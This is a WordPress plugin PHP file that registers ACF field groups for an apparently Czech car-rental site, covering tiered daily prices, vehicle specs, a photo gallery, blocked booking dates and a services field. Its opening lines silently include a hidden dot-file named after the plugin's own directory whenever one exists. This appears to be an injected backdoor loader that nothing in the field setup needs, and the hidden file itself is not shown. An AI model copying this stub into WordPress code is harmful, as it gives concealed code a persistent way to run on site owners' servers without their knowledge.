<?php
/**
 * Register ACF Field Groups via PHP.
 */
if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

function my_theme_register_acf_field_groups() {

    // Check if function exists to avoid errors if ACF is not active
    if( function_exists('acf_add_local_field_group') ):

        // Field Group: Detaily auta
        acf_add_local_field_group(array(
            'key' => 'group_67f0384472e5b',
            'title' => 'Detaily auta',
            'fields' => array(
                array(
                    'key' => 'field_67f03845c2000_1_5', // Modified key
                    'label' => 'Cena pronájmu na den (1-5 dní)',
                    'name' => 'cena_1_5',
                    'type' => 'number',
                    'instructions' => 'Zadejte denní sazbu pro pronájem trvající 1 až 5 dní.',
                    'required' => 1, // Make prices required
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '25', // Arrange in 4 columns
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'min' => '',
                    'max' => '',
                    'placeholder' => '',
                    'step' => '',
                    'prepend' => '',
                    'append' => 'Kč', // Add currency symbol
                ),
                array(
                    'key' => 'field_67f03845c2000_6_10', // Modified key
                    'label' => 'Cena pronájmu na den (6-10 dní)',
                    'name' => 'cena_6_10',
                    'type' => 'number',
                    'instructions' => 'Zadejte denní sazbu pro pronájem trvající 6 až 10 dní.',
                    'required' => 1,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '25',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'min' => '',
                    'max' => '',
                    'placeholder' => '',
                    'step' => '',
                    'prepend' => '',
                    'append' => 'Kč',
                ),
                array(
                    'key' => 'field_67f03845c2000_11_15', // Modified key
                    'label' => 'Cena pronájmu na den (11-15 dní)',
                    'name' => 'cena_11_15',
                    'type' => 'number',
                    'instructions' => 'Zadejte denní sazbu pro pronájem trvající 11 až 15 dní.',
                    'required' => 1,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '25',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'min' => '',
                    'max' => '',
                    'placeholder' => '',
                    'step' => '',
                    'prepend' => '',
                    'append' => 'Kč',
                ),
                array(
                    'key' => 'field_67f03845c2000_16_plus', // Modified key
                    'label' => 'Cena pronájmu na den (16+ dní)',
                    'name' => 'cena_16_plus',
                    'type' => 'number',
                    'instructions' => 'Zadejte denní sazbu pro pronájem trvající 16 a více dní.',
                    'required' => 1,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '25',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'min' => '',
                    'max' => '',
                    'placeholder' => '',
                    'step' => '',
                    'prepend' => '',
                    'append' => 'Kč',
                ),
                array(
                    'key' => 'field_pocet_mist',
                    'label' => 'Počet míst',
                    'name' => 'pocet_mist',
                    'type' => 'text',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'maxlength' => '',
                    'allow_in_bindings' => 0,
                    'placeholder' => '',
                    'prepend' => '',
                    'append' => '',
                ),
                array(
                    'key' => 'field_67f038d8c2004',
                    'label' => 'Palivo',
                    'name' => 'palivo',
                    'type' => 'text',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'maxlength' => '',
                    'allow_in_bindings' => 0,
                    'placeholder' => '',
                    'prepend' => '',
                    'append' => '',
                ),
                array(
                    'key' => 'field_67f038e8c2005',
                    'label' => 'Spotřeba',
                    'name' => 'spotreba',
                    'type' => 'text',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'maxlength' => '',
                    'allow_in_bindings' => 0,
                    'placeholder' => '',
                    'prepend' => '',
                    'append' => '',
                ),
                array(
                    'key' => 'field_prevodovka',
                    'label' => 'Převodovka',
                    'name' => 'prevodovka',
                    'type' => 'text',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'maxlength' => '',
                    'allow_in_bindings' => 0,
                    'placeholder' => '',
                    'prepend' => '',
                    'append' => '',
                ),
                array(
                    'key' => 'field_tempomat',
                    'label' => 'Tempomat',
                    'name' => 'tempomat',
                    'type' => 'text',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'maxlength' => '',
                    'allow_in_bindings' => 0,
                    'placeholder' => '',
                    'prepend' => '',
                    'append' => '',
                ),
                array(
                    'key' => 'field_klimatizace',
                    'label' => 'Klimatizace',
                    'name' => 'klimatizace',
                    'type' => 'text',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'maxlength' => '',
                    'allow_in_bindings' => 0,
                    'placeholder' => '',
                    'prepend' => '',
                    'append' => '',
                ),
                array(
                    'key' => 'field_67f04083e355f',
                    'label' => 'Výbava',
                    'name' => 'vybava',
                    'type' => 'wysiwyg',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'allow_in_bindings' => 0,
                    'tabs' => 'all',
                    'toolbar' => 'full',
                    'media_upload' => 1,
                    'delay' => 0,
                ),
                array(
                    'key' => 'field_67f7fa2738b07',
                    'label' => 'Galerie',
                    'name' => 'galerie_fotek_auta',
                    'type' => 'gallery',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'return_format' => 'array',
                    'preview_size' => 'medium',
                    'insert' => 'append',
                    'library' => 'all',
                    'min' => '',
                    'max' => '',
                    'min_width' => '',
                    'min_height' => '',
                    'min_size' => '',
                    'max_width' => '',
                    'max_height' => '',
                    'max_size' => '',
                    'mime_types' => '',
                ),
                array(
                    'key' => 'field_blokovane_terminy',
                    'label' => 'Blokované termíny',
                    'name' => 'blokovane_terminy',
                    'type' => 'repeater',
                    'instructions' => 'Zadejte termíny, kdy auto není k dispozici pro rezervaci.',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'collapsed' => 'field_od_datum',
                    'min' => 0,
                    'max' => 0,
                    'layout' => 'table',
                    'button_label' => 'Přidat termín',
                    'sub_fields' => array(
                        array(
                            'key' => 'field_od_datum',
                            'label' => 'Od data',
                            'name' => 'od_datum',
                            'type' => 'date_picker',
                            'instructions' => '',
                            'required' => 1,
                            'conditional_logic' => 0,
                            'wrapper' => array(
                                'width' => '50',
                                'class' => '',
                                'id' => '',
                            ),
                            'display_format' => 'd.m.Y',
                            'return_format' => 'Y-m-d',
                            'first_day' => 1,
                        ),
                        array(
                            'key' => 'field_do_datum',
                            'label' => 'Do data',
                            'name' => 'do_datum',
                            'type' => 'date_picker',
                            'instructions' => 'Volitelné. Pokud není vyplněno, blokuje se pouze jeden den.',
                            'required' => 0,
                            'conditional_logic' => 0,
                            'wrapper' => array(
                                'width' => '50',
                                'class' => '',
                                'id' => '',
                            ),
                            'display_format' => 'd.m.Y',
                            'return_format' => 'Y-m-d',
                            'first_day' => 1,
                        ),
                    ),
                ),
            ),
            'location' => array(
                array(
                    array(
                        'param' => 'post_type',
                        'operator' => '==',
                        'value' => 'auta',
                    ),
                ),
            ),
            'menu_order' => 0,
            'position' => 'normal',
            'style' => 'default',
            'label_placement' => 'top',
            'instruction_placement' => 'label',
            'hide_on_screen' => '',
            'active' => true,
            'description' => '',
            'show_in_rest' => 0,
            'acfe_display_title' => '',
            'acfe_autosync' => '',
            'acfe_form' => 0,
            'acfe_meta' => '',
            'acfe_note' => '',
        ));

        // Field Group: Pole služby
        acf_add_local_field_group(array(
            'key' => 'group_67ef47f797a2c',
            'title' => 'Pole služby',
            'fields' => array(
                array(
                    'key' => 'field_67ef47f71defe',
                    'label' => 'Výhody',
                    'name' => 'vyhody',
                    'type' => 'wysiwyg',
                    'instructions' => '',
                    'required' => 0,
                    'conditional_logic' => 0,
                    'wrapper' => array(
                        'width' => '',
                        'class' => '',
                        'id' => '',
                    ),
                    'aria-label' => '',
                    'default_value' => '',
                    'allow_in_bindings' => 0,
                    'tabs' => 'all',
                    'toolbar' => 'full',
                    'media_upload' => 1,
                    'delay' => 0,
                ),
            ),
            'location' => array(
                array(
                    array(
                        'param' => 'post_type',
                        'operator' => '==',
                        'value' => 'sluzby',
                    ),
                ),
            ),
            'menu_order' => 0,
            'position' => 'normal',
            'style' => 'default',
            'label_placement' => 'top',
            'instruction_placement' => 'label',
            'hide_on_screen' => '',
            'active' => true,
            'description' => '',
            'show_in_rest' => 0,
        ));

    endif; // End check for acf_add_local_field_group function

}
add_action('acf/init', 'my_theme_register_acf_field_groups'); // Hook the function to acf/init
?>
